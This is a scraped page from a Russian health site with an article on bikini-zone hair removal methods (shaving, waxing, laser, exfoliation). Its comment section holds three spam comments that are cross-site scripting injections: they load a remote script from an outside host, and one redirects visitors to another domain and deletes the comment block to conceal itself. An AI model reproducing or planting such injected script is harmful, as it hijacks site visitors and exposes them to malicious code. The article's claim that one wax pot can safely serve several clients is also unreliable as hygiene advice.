Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сделать эпиляцию и не...  >>  Как сделать эпиляцию и не умереть
 
Обратная связь
 

Как сделать эпиляцию и не умереть

Размер шрифта
12 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Кузнецова
Здоровье инфо
  • google_analytics: false
  • Нравится

Существует множество способов удаления нежелательных волос в зоне бикини. О плюсах и минусах каждого из них читайте в нашей статье.

Казалось бы, эпиляция – обычная процедура, но, тем не менее, сделанная неправильно, она может вызвать сыпь или инфекции кожи. Следуйте этим советам, чтобы сделать удаление волос безопасным и безболезненным.

Использование бритвы – самый простой и быстрый способ удаления волос в зоне бикини. Эту процедуру легко выполнить в домашних условиях. Не забывайте пользоваться гелем или кремом, который уменьшит раздражение кожи. Движения бритвой следует делать по направлению роста волос. Когда вы закончите удаление основной массы волос, проведите бритвой в противоположном направлении.

Эпиляцию воском лучше делать в середине менструального цикла, так как гормональные изменения, которые происходят перед или после месячных, могут сделать кожу более чувствительной к боли. Данная процедура доступна, как в домашних условиях, так и в салоне. Чаще всего используются два типа воска: теплый или горячий, но последним рекомендуется пользоваться только в салоне. Если вы впервые пришли на эпиляцию в салон постарайтесь расслабиться, поговорите на отвлеченные темы с мастером. Чем больше вы будете стесняться или зажиматься, тем болезненнее вам покажется процедура. 

Убедитесь, что каждая палочка для воска используется лишь единожды, так как повторное ее использование может привести к появлению вагинальных бородавок или бактериальных инфекций, например фолликулита. А вот баночка для воска может быть одна на несколько клиентов – это безопасно.

Лазерное удаление волос. Такой метод избавления волос не только избавит вас от нежелательных волосков, но удалит и их луковицы. Но лазерное удаление подходит не всем. Лучше всего делать лазерную эпиляцию обладательницам светлой кожи и темных волосков. Это обусловлено тем, что если цвет волос не сильно контрастирует с цветом кожи, лазеру затруднительнее отыскать волоски.

Ничто так не портит гладкую линию бикини, как вросшие волосы. Отшелушивание кожи может помочь предотвратить эту проблему. Эту процедуру желательно проводить через 24 часа после бритья или через 48 часов после удаления волос воском. Если вросшие волосы все же появились, вы можете удалить их с помощью пинцета.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Проблема облысения решена! Врачи заставляют лысые головы покрываться волосами!   Естественная красота и здоровье волос   Мифы о косметике   Как не подцепить рак летом  
25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины 14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Как постричься там, внизу
Вы бреете ноги неправильно!
Все нормально, вы просто стареете

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.